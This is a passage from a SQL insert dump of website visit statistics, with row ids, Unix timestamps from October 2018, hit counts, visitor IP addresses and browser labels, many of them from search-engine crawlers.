2.74','other'),(310931,1538397627,1,1,0,0,'66.249.64.131','chrome'),(310932,1538398229,1,1,0,0,'207.46.13.95','other'),(310933,1538398684,1,1,0,0,'46.211.203.25','firefox'),(310934,1538399108,1,1,0,0,'66.102.9.38','chrome'),(310935,1538399166,1,1,0,0,'66.102.9.35','chrome'),(310936,1538399264,1,1,0,0,'54.165.59.7','other'),(310937,1538399275,1,1,0,0,'91.250.59.156','chrome'),(310938,1538399987,1,1,0,0,'93.72.104.130','firefox'),(310939,1538400499,1,1,0,0,'91.250.59.156','chrome'),(310940,1538400948,1,1,0,0,'91.196.178.85','chrome'),(310941,1538402786,1,1,0,0,'107.21.1.8','other'),(310942,1538402788,1,1,0,0,'54.208.102.37','other'),(310943,1538403142,1,1,0,0,'134.249.146.125','chrome'),(310944,1538403293,1,1,0,0,'77.111.244.4','chrome'),(310945,1538403434,2,2,0,0,'8.29.198.27','other'),(310946,1538403854,1,1,0,0,'66.249.64.59','chrome'),(310947,1538404690,1,1,0,0,'194.37.248.11','firefox'),(310948,1538405136,1,1,0,0,'37.9.113.182','other'),(310949,1538405285,4,4,0,0,'194.37.248.11','chrome'),(310950,1538407720,1,1,0,0,'62.205.134.182','msie'),(310951,1538408010,1,1,0,0,'8.29.198.25','other'),(310952,1538408028,1,1,0,0,'207.46.13.233','other'),(310953,1538408313,1,1,0,0,'180.76.15.160','other'),(310954,1538408587,4,4,0,0,'216.244.66.241','other'),(310955,1538408725,1,1,0,0,'37.54.18.60','chrome'),(310956,1538408861,1,1,0,0,'77.111.244.33','chrome'),(310957,1538409345,1,1,0,0,'92.113.47.4','firefox'),(310958,1538410265,1,1,0,0,'40.77.167.99','other'),(310959,1538410313,1,1,0,0,'180.76.15.21','other'),(310960,1538410411,1,1,0,0,'37.54.18.60','chrome'),(310961,1538410454,1,1,0,0,'91.196.178.136','firefox'),(310962,1538410728,2,2,0,0,'87.250.224.46','other'),(310963,1538410741,5,5,0,0,'178.154.171.88','other'),(310964,1538410877,4,4,0,0,'141.8.142.74','other'),(310965,1538411587,1,1,0,0,'66.249.64.199','chrome'),(310966,1538411647,1,1,0,0,'91.196.178.86','chrome'),(310967,1538411653,1,1,0,0,'176.241.130.165','chrome'),(310968,1538411948,3,3,0,0,'141.8.142.74','other'),(310969,1538411957,5,5,0,0,'178.154.171.88','other'),(310970,1538411962,1,1,0,0,'87.250.224.46','other'),(310971,1538411998,1,1,0,0,'188.115.165.82','chrome'),(310972,1538412683,1,1,0,0,'159.89.23.245','firefox'),(310973,1538412684,1,1,0,0,'159.65.168.252','firefox'),(310974,1538412951,4,4,0,0,'178.154.171.88','other'),(310975,1538412967,1,1,0,0,'87.250.224.46','other'),(310976,1538413102,7,7,0,0,'141.8.142.74','other'),(310977,1538413901,2,2,0,0,'216.244.66.241','other'),(310978,1538414135,4,4,0,0,'141.8.142.74','other'),(310979,1538414258,1,1,0,0,'8.29.198.25','other'),(310980,1538414448,1,1,0,0,'8.29.198.27','other'),(310981,1538415143,3,3,0,0,'141.8.142.74','other'),(310982,1538415349,3,3,0,0,'178.154.171.88','other'),(310983,1538415935,1,1,0,0,'178.154.244.62','other'),(310984,1538416063,1,1,0,0,'188.163.5.20','chrome'),(310985,1538416201,1,1,0,0,'37.9.113.182','other'),(310986,1538416609,3,3,0,0,'141.8.142.74','other'),(310987,1538417568,3,3,0,0,'141.8.142.74','other'),(310988,1538417654,1,1,0,0,'87.250.224.46','other'),(310989,1538418057,2,2,0,0,'178.154.171.88','other'),(310990,1538418113,2,2,0,0,'216.244.66.241','other'),(310991,1538418844,1,1,0,0,'8.29.198.27','other'),(310992,1538419191,3,3,0,0,'178.154.171.88','other'),(310993,1538420354,1,1,0,0,'178.154.171.88','other'),(310994,1538420389,1,1,0,0,'207.46.13.233','other'),(310995,1538420479,1,1,0,0,'93.73.173.105','chrome'),(310996,1538420665,1,1,0,0,'142.54.172.123','other'),(310997,1538420796,1,1,0,0,'40.77.167.99','other'),(310998,1538420854,1,1,0,0,'141.8.142.74','other'),(310999,1538421969,1,1,0,0,'87.250.224.46','other'),(311000,1538423296,1,1,0,0,'207.46.13.98','other'),(311001,1538424616,1,1,0,0,'207.46.13.98','other'),(311002,1538425092,2,2,0,0,'8.29.198.27','other'),(311003,1538426332,2,2,0,0,'216.244.66.241','other'),(311004,1538427971,1,1,0,0,'207.46.13.98','other'),(311005,1538428870,2,2,0,0,'216.244.66.241','other'),(311006,1538429676,1,1,0,0,'8.29.198.27','other'),(311007,1538430057,1,1,0,0,'66.249.64.201','chrome'),(311008,1538431093,3,3,0,0,'141.8.142.74','other'),(311009,1538431315,1,1,0,0,'216.244.66.241','other'),(311010,1538432415,1,1,0,0,'40.77.167.99','other'),(311011,1538433454,1,1,0,0,'54.165.59.7','other'),(311012,1538434015,1,1,0,0,'82.145.208.31','other'),(311013,1538434534,1,1,0,0,'176.126.252.12','other'),(311014,1538435005,5,5,0,0,'95.216.41.162','other'),(311015,1538435920,1,1,0,0,'8.29.198.26','other'),(311016,1538436112,1,1,0,0,'8.29.198.27','other'),(311017,1538436364,1,1,0,0,'66.249.64.201','chrome'),(311018,1538436393,1,1,0,0,'66.249.64.199','chrome'),(311019,1538436610,1,1,0,0,'66.249.64.59','chrome'),(311020,1538436938,1,1,0,0,'216.244.66.241','other'),(311021,1538438222,1,1,0,0,'31.184.238.34','chrome'),(311022,1538438297,1,1,0,0,'35.0.127.52','chrome'),(311023,1538438991,10,10,0,0,'207.46.13.98','other'),(311024,1538439270,1,1,0,0,'66.249.64.57','chrome'),(311025,1538439285,9,9,0,0,'207.46.13.233','other'),(311026,1538439292,1,1,0,0,'216.244.66.241','other'),(311027,1538439362,4,4,0,0,'40.77.167.99','other'),(311028,1538439834,1,1,0,0,'66.249.64.59','chrome'),(311029,1538440509,1,1,0,0,'8.29.198.25','other'),(311030,1538440632,16,16,0,0,'141.8.142.74','other'),(311031,1538440663,9,9,0,0,'178.154.171.88','other'),(311032,1538440686,3,3,0,0,'87.250.224.46','other'),(311033,1538441235,2,2,0,0,'216.244.66.241','other'),(311034,1538441541,1,1,0,0,'66.249.64.57','chrome'),(311035,1538441542,1,1,0,0,'37.17.172.132','firefox'),(311036,1538443955,1,1,0,0,'216.244.66.241','other'),(311037,1538443964,4,4,0,0,'141.8.142.74','other'),(311038,1538443980,1,1,0,0,'178.154.244.34','other'),(311039,1538444094,1,1,0,0,'178.154.171.88','other'),(311040,1538444202,1,1,0,0,'178.154.244.24','other'),(311041,1538444260,1,1,0,0,'87.250.224.46','other'),(311042,1538444270,1,1,0,0,'178.154.244.62','other'),(311043,1538445734,1,1,0,0,'207.46.13.98','other'),(311044,1538446750,2,2,0,0,'8.29.198.26','other'),(311045,1538446865,2,2,0,0,'216.244.66.241','other'),(311046,1538446981,2,2,0,0,'95.163.255.95','other'),(311047,1538448657,1,1,0,0,'141.8.142.74','other'),(311048,1538448919,1,1,0,0,'216.244.66.241','other'),(311049,1538449219,1,1,0,0,'66.249.64.201','chrome'),(311050,1538449668,1,1,0,0,'141.8.142.74','other'),(311051,1538450938,1,1,0,0,'180.76.15.152','other'),(311052,1538451057,1,1,0,0,'176.193.8.22','chrome'),(311053,1538451059,1,1,0,0,'91.243.56.65','chrome'),(311054,1538451340,1,1,0,0,'8.29.198.27','other'),(311055,1538452037,1,1,0,0,'207.46.13.95','other'),(311056,1538452642,1,1,0,0,'66.249.64.59','chrome'),(311057,1538453552,1,1,0,0,'37.9.113.101','other'),(311058,1538453752,1,1,0,0,'95.211.180.200','chrome'),(311059,1538453809,1,1,0,0,'40.77.167.126','other'),(311060,1538453932,1,0,1,0,'66.249.64.195',''),(311061,1538454154,1,1,0,0,'216.244.66.241','other'),(311062,1538457287,1,1,0,0,'66.249.64.201','chrome'),(311063,1538457465,2,2,0,0,'77.111.244.45','chrome'),(311064,1538457584,1,1,0,0,'8.29.198.25','other'),(311065,1538457773,1,1,0,0,'8.29.198.27','other'),(311066,1538457966,1,1,0,0,'91.196.178.74','chrome'),(311067,1538458256,2,2,0,0,'87.250.224.46','other'),(311068,1538458285,1,1,0,0,'91.196.178.97','chrome'),(311069,1538458338,1,1,0,0,'37.9.113.182','other'),(311070,1538458364,1,1,0,0,'66.249.64.201','chrome'),(311071,1538458480,1,1,0,0,'207.46.13.98','other'),(311072,1538458526,1,1,0,0,'207.46.13.95','other'),(311073,1538458790,2,2,0,0,'66.249.64.195','chrome'),(311074,1538459143,2,2,0,0,'178.154.171.88','other'),(311075,1538459170,3,3,0,0,'141.8.142.74','other'),(311076,1538459683,1,1,0,0,'178.154.244.62','other'),(311077,1538459943,1,1,0,0,'207.46.13.95','other'),(311078,1538460429,1,1,0,0,'141.8.142.74','other'),(311079,1538460638,1,1,0,0,'94.178.5.1','chrome'),(311080,1538461109,2,2,0,0,'91.196.178.190','chrome'),(311081,1538461204,5,5,0,0,'40.77.167.126','other'),(311082,1538461329,1,1,0,0,'46.211.104.31','chrome'),(311083,1538461355,1,1,0,0,'46.211.87.30','other'),(311084,1538462090,1,1,0,0,'92.112.226.16','firefox'),(311085,1538462181,1,1,0,0,'8.29.198.27','other'),(311086,1538462207,1,0,1,0,'37.187.26.42',''),(311087,1538462448,1,1,0,0,'195.10.210.70','chrome'),(311088,1538462520,2,2,0,0,'178.92.156.68','chrome'),(311089,1538463025,1,1,0,0,'62.205.134.182','msie'),(311090,1538463294,1,1,0,0,'91.196.178.169','chrome'),(311091,1538463304,1,1,0,0,'54.165.59.7','other'),(311092,1538463503,1,1,0,0,'46.211.138.134','other'),(311093,1538464338,3,3,0,0,'216.244.66.241','other'),(311094,1538464762,1,1,0,0,'91.196.178.129','firefox'),(311095,1538464949,1,1,0,0,'66.249.64.195','chrome'),(311096,1538465082,2,2,0,0,'54.165.59.7','other'),(311097,1538465340,1,1,0,0,'91.196.178.168','firefox'),(311098,1538465817,1,1,0,0,'66.249.64.199','chrome'),(311099,1538466497,1,1,0,0,'91.196.178.131','chrome'),(311100,1538466674,1,1,0,0,'40.77.167.126','other'),(311101,1538467340,2,2,0,0,'216.244.66.241','other'),(311102,1538467488,1,0,1,0,'66.249.64.59',''),(311103,1538467586,1,1,0,0,'91.196.178.131','chrome'),(311104,1538467832,2,2,0,0,'54.165.59.7','other'),(311105,1538467834,1,1,0,0,'91.196.178.129','firefox'),(311106,1538468325,1,1,0,0,'66.249.64.195','chrome'),(311107,1538468413,2,2,0,0,'8.29.198.27','other'),(311108,1538468551,1,1,0,0,'40.77.167.99','other'),(311109,1538468756,1,1,0,0,'52.53.201.78','chrome'),(311110,1538469323,1,1,0,0,'54.193.232.235','chrome'),(311111,1538470601,1,1,0,0,'193.19.152.77','other'),(311112,1538471140,1,1,0,0,'141.8.142.74','other'),(311113,1538471488,1,1,0,0,'66.249.64.201','chrome'),(311114,1538471548,1,1,0,0,'87.250.224.46','other'),(311115,1538472028,1,1,0,0,'178.154.171.88','other'),(311116,1538472097,1,1,0,0,'91.196.178.39','chrome'),(311117,1538472389,3,3,0,0,'141.8.142.74','other'),(311118,1538472510,1,1,0,0,'91.196.177.46','firefox'),(311119,1538473016,1,1,0,0,'8.29.198.25','other'),(311120,1538473145,1,1,0,0,'91.196.178.183','chrome'),(311121,1538473467,1,1,0,0,'95.67.120.214','chrome'),(311122,1538473480,1,1,0,0,'54.165.59.7','other'),(311123,1538474101,3,3,0,0,'141.8.142.74','other'),(311124,1538474124,2,2,0,0,'178.154.171.88','other'),(311125,1538474189,1,1,0,0,'37.9.113.182','other'),(311126,1538474932,1,1,0,0,'87.250.224.46','other'),(311127,1538475264,3,3,0,0,'141.8.142.74','other'),(311128,1538475879,2,2,0,0,'66.249.64.195','chrome'),(311129,1538476205,2,2,0,0,'95.216.5.188','other'),(311130,1538476848,1,1,0,0,'178.154.244.24','other'),(311131,1538479239,2,2,0,0,'8.29.198.25','other'),(311132,1538479714,1,1,0,0,'66.249.64.201','chrome'),(311133,1538479826,1,1,0,0,'145.239.82.103','other'),(311134,1538479834,2,2,0,0,'66.249.64.199','chrome'),(311135,1538480955,1,1,0,0,'37.17.172.132','firefox'),(311136,1538481283,1,1,0,0,'207.46.13.95','other'),(311137,1538482227,2,2,0,0,'66.249.64.199','chrome'),(311138,1538482362,1,1,0,0,'94.179.37.214','firefox'),(311139,1538482554,1,1,0,0,'54.165.59.7','other'),(311140,1538483522,1,1,0,0,'66.249.64.195','chrome'),(311141,1538483612,2,2,0,0,'66.249.64.199','chrome'),(311142,1538483859,1,1,0,0,'8.29.198.25','other'),(311143,1538484751,1,1,0,0,'91.196.178.184','chrome'),(311144,1538484832,1,1,0,0,'5.58.128.166','chrome'),(311145,1538486340,1,1,0,0,'199.58.86.209','other'),(311146,1538486448,1,1,0,0,'77.111.244.7','chrome'),(311147,1538486585,1,1,0,0,'66.249.64.199','chrome'),(311148,1538487312,1,1,0,0,'91.196.178.74','chrome'),(311149,1538487512,1,1,0,0,'40.77.167.88','other'),(311150,1538487839,1,1,0,0,'216.244.66.241','other'),(311151,1538488406,1,1,0,0,'66.249.64.201','chrome'),(311152,1538488558,1,1,0,0,'66.249.64.195','chrome'),(311153,1538488640,5,5,0,0,'5.9.140.242','other'),(311154,1538489204,1,1,0,0,'207.46.13.113','other'),(311155,1538489843,1,1,0,0,'66.249.64.201','chrome'),(311156,1538490063,1,1,0,0,'8.29.198.26','other'),(311157,1538490274,1,1,0,0,'8.29.198.25','other'),(311158,1538490362,1,1,0,0,'37.9.113.115','other'),(311159,1538490365,2,2,0,0,'87.250.224.46','other'),(311160,1538490948,1,1,0,0,'40.77.167.88','other'),(311161,1538491513,1,0,1,0,'66.249.64.199',''),(311162,1538493597,1,1,0,0,'66.249.64.59','chrome'),(311163,1538494332,1,1,0,0,'62.205.134.182','msie'),(311164,1538494698,1,1,0,0,'8.29.198.27','other'),(311165,1538494992,2,2,0,0,'66.249.64.201','chrome'),(311166,1538495220,2,2,0,0,'66.249.64.195','chrome'),(311167,1538495705,1,1,0,0,'216.244.66.241','other'),(311168,1538496636,1,1,0,0,'66.249.64.199','chrome'),(311169,1538497822,1,1,0,0,'91.196.178.76','chrome'),(311170,1538497982,1,1,0,0,'216.244.66.241','other'),(311171,1538498100,1,1,0,0,'66.249.64.61','chrome'),(311172,1538498192,1,1,0,0,'66.249.64.199','chrome'),(311173,1538499343,1,1,0,0,'91.196.178.33','chrome'),(311174,1538500682,1,1,0,0,'66.249.64.199','chrome'),(311175,1538500891,1,1,0,0,'8.29.198.25','other'),(311176,1538500922,1,1,0,0,'91.196.178.167','chrome'),(311177,1538501107,1,1,0,0,'8.29.198.27','other'),(311178,1538501157,1,1,0,0,'95.108.213.4','other'),(311179,1538501189,1,1,0,0,'37.9.113.148','other'),(311180,1538501192,3,3,0,0,'178.154.244.29','other'),(311181,1538501203,1,1,0,0,'5.45.207.79','other'),(311182,1538501956,1,1,0,0,'178.154.244.11','other'),(311183,1538502054,1,1,0,0,'207.46.13.247','other'),(311184,1538502925,1,1,0,0,'66.249.64.199','chrome'),(311185,1538503166,1,1,0,0,'37.55.56.116','chrome'),(311186,1538503862,1,1,0,0,'66.249.64.195','chrome'),(311187,1538504449,1,1,0,0,'95.163.255.93','other'),(311188,1538504683,1,1,0,0,'88.198.33.145','other'),(311189,1538505414,1,1,0,0,'66.249.64.199','chrome'),(311190,1538505420,1,1,0,0,'66.249.64.195','chrome'),(311191,1538505530,1,1,0,0,'8.29.198.27','other'),(311192,1538506133,1,1,0,0,'40.77.167.180','other'),(311193,1538506177,1,1,0,0,'66.249.64.201','chrome'),(311194,1538506527,1,1,0,0,'46.211.106.75','other'),(311195,1538507162,1,1,0,0,'207.46.13.247','other'),(311196,1538507366,1,1,0,0,'66.249.64.199','chrome'),(311197,1538507425,1,1,0,0,'178.154.244.11','other'),(311198,1538507428,1,1,0,0,'5.45.207.79','other'),(311199,1538507587,2,2,0,0,'40.77.167.37','other'),(311200,1538507591,2,2,0,0,'40.77.167.39','other'),(311201,1538507886,1,1,0,0,'40.77.167.0','other'),(311202,1538508165,1,1,0,0,'46.211.24.233','chrome'),(311203,1538508374,1,1,0,0,'37.17.172.132','firefox'),(311204,1538509044,1,1,0,0,'216.244.66.241','other'),(311205,1538510050,1,1,0,0,'178.154.244.29','other'),(311206,1538510051,1,1,0,0,'178.154.244.11','other'),(311207,1538510178,1,1,0,0,'66.249.64.201','chrome'),(311208,1538510418,1,1,0,0,'62.205.134.182','msie'),(311209,1538510693,2,2,0,0,'144.76.120.197','other'),(311210,1538511065,1,1,0,0,'108.59.8.70','other'),(311211,1538511725,1,1,0,0,'8.29.198.26','other'),(311212,1538511928,1,1,0,0,'8.29.198.25','other'),(311213,1538511976,1,1,0,0,'46.133.145.144','chrome'),(311214,1538512425,17,17,0,0,'95.216.41.162','other'),(311215,1538513373,1,1,0,0,'185.220.101.13','chrome'),(311216,1538514345,1,1,0,0,'185.10.68.128','chrome'),(311217,1538514692,1,1,0,0,'207.46.13.48','other'),(311218,1538514909,1,1,0,0,'166.62.102.205','firefox'),(311219,1538515821,1,1,0,0,'180.76.15.144','other'),(311220,1538516369,1,1,0,0,'8.29.198.25','other'),(311221,1538516506,1,1,0,0,'66.249.64.195','chrome'),(311222,1538518069,1,1,0,0,'216.244.66.241','other'),(311223,1538518917,1,1,0,0,'207.46.13.89','other'),(311224,1538519460,1,1,0,0,'40.77.167.180','other'),(311225,1538519525,1,1,0,0,'216.244.66.241','other'),(311226,1538519728,1,1,0,0,'66.249.64.195','chrome'),(311227,1538519918,1,1,0,0,'66.249.64.59','chrome'),(311228,1538520496,1,1,0,0,'66.249.64.199','chrome'),(311229,1538520651,1,1,0,0,'5.45.207.19','other'),(311230,1538520673,2,2,0,0,'178.154.244.11','other'),(311231,1538520887,2,2,0,0,'5.45.207.79','other'),(311232,1538520909,2,2,0,0,'178.154.244.29','other'),(311233,1538520936,1,1,0,0,'5.199.141.233','other'),(311234,1538521086,1,1,0,0,'95.108.213.4','other'),(311235,1538521437,2,2,0,0,'216.244.66.241','other'),(311236,1538521588,1,1,0,0,'66.249.64.195','chrome'),(311237,1538522173,1,1,0,0,'66.249.64.199','chrome'),(311238,1538522558,2,2,0,0,'8.29.198.26','other'),(311239,1538522869,31,31,0,0,'91.121.168.80','other'),(311240,1538523955,1,1,0,0,'66.249.64.201','chrome'),(311241,1538526678,1,1,0,0,'5.45.207.19','other'),(311242,1538527034,1,1,0,0,'37.17.172.132','firefox'),(311243,1538527211,1,1,0,0,'8.29.198.26','other'),(311244,1538527984,1,1,0,0,'157.55.39.126','other'),(311245,1538529900,4,4,0,0,'178.154.244.11','other'),(311246,1538530036,1,1,0,0,'5.45.207.79','other'),(311247,1538530179,4,4,0,0,'178.154.244.29','other'),(311248,1538530489,1,1,0,0,'66.249.64.59','chrome'),(311249,1538530617,1,1,0,0,'216.244.66.241','other'),(311250,1538531061,34,34,0,0,'144.76.96.236','other'),(311251,1538531167,1,1,0,0,'157.55.39.126','other'),(311252,1538531531,1,1,0,0,'207.46.13.89','other'),(311253,1538532384,4,4,0,0,'178.154.244.29','other'),(311254,1538532459,2,2,0,0,'5.45.207.19','other'),(311255,1538532671,1,1,0,0,'5.45.207.79','other'),(311256,1538532795,2,2,0,0,'178.154.244.11','other'),(311257,1538533255,3,3,0,0,'216.244.66.241','other'),(311258,1538533367,1,1,0,0,'178.154.244.29','other'),(311259,1538533380,1,1,0,0,'8.29.198.27','other'),(311260,1538533584,1,1,0,0,'8.29.198.26','other'),(311261,1538534860,1,1,0,0,'216.244.66.241','other'),(311262,1538535231,3,3,0,0,'178.154.244.11','other'),(311263,1538535380,5,5,0,0,'178.154.244.29','other'),(311264,1538535466,1,1,0,0,'87.250.224.47','other'),(311265,1538536079,1,1,0,0,'5.45.207.79','other'),(311266,1538536556,1,1,0,0,'178.154.244.29','other'),(311267,1538536922,1,1,0,0,'178.154.244.11','other'),(311268,1538537222,1,1,0,0,'66.249.64.201','chrome'),(311269,1538538017,1,1,0,0,'82.145.209.160','other'),(311270,1538538022,1,1,0,0,'54.36.148.65','other'),(311271,1538538045,1,1,0,0,'8.29.198.26','other'),(311272,1538538081,1,1,0,0,'54.36.149.81','other'),(311273,1538538210,1,1,0,0,'54.36.149.92','other'),(311274,1538538639,1,1,0,0,'66.249.64.199','chrome'),(311275,1538538668,1,1,0,0,'54.36.149.26','other'),(311276,1538539046,1,1,0,0,'54.36.148.214','other'),(311277,1538539114,1,1,0,0,'54.36.148.114','other'),(311278,1538539125,1,1,0,0,'54.36.148.175','other'),(311279,1538539269,1,1,0,0,'54.36.148.229','other'),(311280,1538539279,1,1,0,0,'54.36.148.186','other'),(311281,1538539492,1,1,0,0,'54.36.149.102','other'),(311282,1538539691,6,6,0,0,'178.154.244.29','other'),(311283,1538539840,1,1,0,0,'54.36.149.42','other'),(311284,1538540001,2,2,0,0,'178.154.244.11','other'),(311285,1538540049,1,1,0,0,'5.45.207.19','other'),(311286,1538540282,1,1,0,0,'141.8.142.103','other'),(311287,1538540447,1,1,0,0,'54.36.148.246','other'),(311288,1538540448,37,37,0,0,'167.114.1.124','other'),(311289,1538540596,4,4,0,0,'178.154.244.29','other'),(311290,1538540711,1,1,0,0,'5.45.207.79','other'),(311291,1538540755,1,1,0,0,'180.76.15.12','other'),(311292,1538540925,1,1,0,0,'54.36.149.77','other'),(311293,1538541048,1,1,0,0,'216.244.66.241','other'),(311294,1538541265,1,1,0,0,'54.36.148.73','other'),(311295,1538541387,4,4,0,0,'85.10.207.195','other'),(311296,1538541531,29,29,0,0,'167.114.1.124','other'),(311297,1538541776,2,2,0,0,'178.154.244.29','other'),(311298,1538541854,1,1,0,0,'54.36.148.77','other'),(311299,1538542042,1,1,0,0,'54.36.148.113','other'),(311300,1538542465,53,53,0,0,'167.114.1.124','other'),(311301,1538542741,1,1,0,0,'54.36.148.183','other'),(311302,1538542759,1,1,0,0,'54.36.148.177','other'),(311303,1538542793,1,1,0,0,'54.36.148.189','other'),(311304,1538542849,1,1,0,0,'54.36.149.8','other'),(311305,1538542900,2,2,0,0,'54.36.148.126','other'),(311306,1538543124,1,1,0,0,'54.36.148.140','other'),(311307,1538543187,1,1,0,0,'54.36.149.63','other'),(311308,1538543203,1,1,0,0,'54.36.148.54','other'),(311309,1538543207,1,1,0,0,'54.36.149.92','other'),(311310,1538543378,45,45,0,0,'167.114.1.124','other'),(311311,1538543508,1,1,0,0,'54.36.149.12','other'),(311312,1538543676,1,1,0,0,'91.196.178.74','chrome'),(311313,1538543698,1,1,0,0,'54.36.148.90','other'),(311314,1538543708,1,1,0,0,'54.36.148.198','other'),(311315,1538544049,1,1,0,0,'54.36.149.5','other'),(311316,1538544118,1,1,0,0,'46.229.168.134','other'),(311317,1538544128,1,1,0,0,'54.36.148.60','other'),(311318,1538544204,2,2,0,0,'8.29.198.27','other'),(311319,1538544365,55,55,0,0,'167.114.1.124','other'),(311320,1538544430,1,1,0,0,'54.36.148.105','other'),(311321,1538544999,1,1,0,0,'80.252.154.233','chrome'),(311322,1538545010,1,1,0,0,'54.36.148.132','other'),(311323,1538545041,1,1,0,0,'95.132.52.203','firefox'),(311324,1538545053,1,1,0,0,'37.53.228.75','chrome'),(311325,1538545284,53,53,0,0,'167.114.1.124','other'),(311326,1538545346,1,1,0,0,'54.36.149.103','other'),(311327,1538545474,1,1,0,0,'39.104.144.201','other'),(311328,1538545571,1,1,0,0,'54.36.149.81','other'),(311329,1538545749,2,2,0,0,'66.249.64.195','chrome'),(311330,1538546022,1,1,0,0,'66.249.64.201','chrome'),(311331,1538546098,1,1,0,0,'54.36.148.18','other'),(311332,1538546158,1,1,0,0,'54.36.148.122','other'),(311333,1538546216,28,28,0,0,'167.114.1.124','other'),(311334,1538546385,1,1,0,0,'54.36.148.206','other'),(311335,1538546491,1,1,0,0,'54.36.149.84','other'),(311336,1538546589,1,1,0,0,'54.36.148.58','other'),(311337,1538546610,1,1,0,0,'91.196.178.74','chrome'),(311338,1538546953,1,1,0,0,'66.249.64.195','chrome'),(311339,1538547357,1,1,0,0,'54.36.148.246','other'),(311340,1538547422,1,1,0,0,'40.77.167.141','other'),(311341,1538547566,1,1,0,0,'54.36.148.216','other'),(311342,1538547602,1,1,0,0,'54.36.148.31','other'),(311343,1538547704,1,1,0,0,'54.36.149.1','other'),(311344,1538547795,1,1,0,0,'54.36.148.140','other'),(311345,1538547833,1,1,0,0,'54.36.148.86','other'),(311346,1538548144,1,1,0,0,'54.36.148.232','other'),(311347,1538548401,1,1,0,0,'54.36.148.18','other'),(311348,1538548484,1,1,0,0,'54.36.148.58','other'),(311349,1538548503,1,1,0,0,'54.36.148.28','other'),(311350,1538548523,1,1,0,0,'54.36.148.54','other'),(311351,1538548677,1,1,0,0,'66.249.64.201','chrome'),(311352,1538548737,1,1,0,0,'54.36.148.17','other'),(311353,1538548891,1,1,0,0,'8.29.198.25','other'),(311354,1538548937,1,1,0,0,'91.196.178.74','chrome'),(311355,1538549107,5,5,0,0,'178.154.244.11','other'),(311356,1538549119,7,7,0,0,'178.154.244.29','other'),(311357,1538549296,1,1,0,0,'54.36.148.133','other'),(311358,1538549516,1,1,0,0,'39.104.226.239','other'),(311359,1538549549,1,1,0,0,'54.36.148.245','other'),(311360,1538549687,1,1,0,0,'54.36.148.200','other'),(311361,1538549688,1,1,0,0,'37.17.172.132','firefox'),(311362,1538549748,1,1,0,0,'66.249.64.199','chrome'),(311363,1538550014,1,1,0,0,'141.8.142.103','other'),(311364,1538550047,1,1,0,0,'54.36.148.154','other'),(311365,1538550078,1,1,0,0,'46.229.168.132','other'),(311366,1538550295,6,6,0,0,'178.154.244.29','other'),(311367,1538550345,3,3,0,0,'178.154.244.11','other'),(311368,1538550370,1,1,0,0,'87.250.224.47','other'),(311369,1538550531,1,1,0,0,'54.36.149.29','other'),(311370,1538550816,2,2,0,0,'199.58.86.211','other'),(311371,1538550867,1,1,0,0,'66.249.64.199','chrome'),(311372,1538550890,1,1,0,0,'91.196.178.74','chrome'),(311373,1538550957,1,1,0,0,'54.36.148.82','other'),(311374,1538551020,1,1,0,0,'178.93.249.20','chrome'),(311375,1538551156,1,1,0,0,'54.36.148.121','other'),(311376,1538551302,3,3,0,0,'178.154.244.11','other'),(311377,1538551340,1,1,0,0,'212.90.169.167','chrome'),(311378,1538551363,2,2,0,0,'5.45.207.79','other'),(311379,1538551476,1,1,0,0,'54.36.148.205','other'),(311380,1538551497,1,1,0,0,'91.196.178.169','chrome'),(311381,1538551583,4,4,0,0,'178.154.244.29','other'),(311382,1538551670,1,1,0,0,'180.76.15.31','other'),(311383,1538551787,1,1,0,0,'54.36.149.15','other'),(311384,1538551949,1,1,0,0,'54.36.148.174','other'),(311385,1538552046,1,1,0,0,'66.249.64.199','chrome'),(311386,1538552157,1,1,0,0,'54.36.148.165','other'),(311387,1538552355,1,1,0,0,'54.36.148.30','other'),(311388,1538552386,1,1,0,0,'54.36.148.22','other'),(311389,1538552484,1,1,0,0,'54.36.149.45','other'),(311390,1538552638,1,1,0,0,'54.36.148.214','other'),(311391,1538552642,1,1,0,0,'54.36.148.21','other'),(311392,1538552715,1,1,0,0,'54.36.148.136','other'),(311393,1538552781,1,1,0,0,'54.36.149.68','other'),(311394,1538552939,1,1,0,0,'54.36.148.157','other'),(311395,1538552956,1,1,0,0,'54.36.148.55','other'),(311396,1538553197,1,1,0,0,'54.36.148.23','other'),(311397,1538553512,1,1,0,0,'54.36.148.72','other'),(311398,1538553670,1,1,0,0,'180.76.15.150','other'),(311399,1538553734,1,1,0,0,'91.196.178.71','chrome'),(311400,1538553774,1,1,0,0,'54.36.148.129','other'),(311401,1538553777,2,2,0,0,'91.196.178.50','chrome'),(311402,1538553877,1,1,0,0,'54.36.149.2','other'),(311403,1538553929,1,1,0,0,'54.36.148.17','other'),(311404,1538554162,1,1,0,0,'66.249.64.199','chrome'),(311405,1538554496,1,1,0,0,'142.93.65.5','other'),(311406,1538554755,1,1,0,0,'54.36.148.40','other'),(311407,1538554854,1,1,0,0,'66.249.64.201','chrome'),(311408,1538554991,1,1,0,0,'54.36.148.224','other'),(311409,1538555031,1,1,0,0,'8.29.198.26','other'),(311410,1538555115,1,1,0,0,'54.36.148.78','other'),(311411,1538555264,1,1,0,0,'8.29.198.25','other'),(311412,1538555450,1,1,0,0,'54.36.148.11','other'),(311413,1538555502,1,1,0,0,'91.196.178.74','chrome'),(311414,1538555536,1,1,0,0,'66.249.64.195','chrome'),(311415,1538555615,1,1,0,0,'54.36.148.189','other'),(311416,1538555827,1,1,0,0,'54.36.148.108','other'),(311417,1538555848,1,1,0,0,'54.36.148.47','other'),(311418,1538555891,1,1,0,0,'54.36.149.106','other'),(311419,1538555916,1,1,0,0,'54.36.148.249','other'),(311420,1538556127,1,1,0,0,'54.36.148.23','other'),(311421,1538556149,1,1,0,0,'180.76.15.145','other'),(311422,1538556678,1,1,0,0,'54.36.148.243','other'),(311423,1538557132,2,2,0,0,'193.107.170.71','chrome'),(311424,1538557189,1,1,0,0,'91.196.178.74','chrome'),(311425,1538557682,1,1,0,0,'54.36.148.117','other'),(311426,1538558026,1,1,0,0,'54.36.148.68','other'),(311427,1538558153,1,1,0,0,'91.196.178.186','chrome'),(311428,1538558168,1,1,0,0,'54.36.148.46','other'),(311429,1538558344,1,1,0,0,'54.36.148.248','other'),(311430,1538558373,1,1,0,0,'54.36.149.31','other'),(311431,1538558639,1,1,0,0,'31.184.238.34','chrome'),(311432,1538558865,1,1,0,0,'66.249.64.199','chrome'),(311433,1538559164,1,1,0,0,'91.225.36.171','chrome'),(311434,1538559401,1,1,0,0,'54.36.148.229','other'),(311435,1538559727,1,1,0,0,'8.29.198.27','other'),(311436,1538559877,1,1,0,0,'207.46.13.120','other'),(311437,1538559993,1,1,0,0,'54